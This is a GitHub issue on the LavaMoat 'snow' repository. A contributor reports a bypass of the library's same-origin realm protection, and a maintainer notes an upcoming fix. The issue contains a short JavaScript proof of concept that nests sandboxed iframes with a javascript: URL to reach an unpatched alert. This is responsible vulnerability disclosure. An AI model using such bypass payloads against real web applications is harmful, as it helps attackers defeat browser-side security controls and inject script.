Bypass using iframe sandbox

LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!

https://lavamoat.github.io/snow/demo/

MIT License

102 stars 9 forks source link

Bypass using iframe sandbox #92

Closed mmndaniel closed 1 year ago

mmndaniel commented 1 year ago

var d = document.createElement('div');
document.body.appendChild(d);
d.innerHTML =  `<iframe
    srcdoc="<iframe sandbox='allow-same-origin' src='javascript:alert(1)'></iframe><script>frames[0].alert.call(top, 1);</script>"
</iframe>`;

Same idea as https://github.com/LavaMoat/snow/issues/90, just using sandbox to break the internal SNOW_WINDOW call :)

weizman commented 1 year ago

seems like #101 will fix this issue as well as #93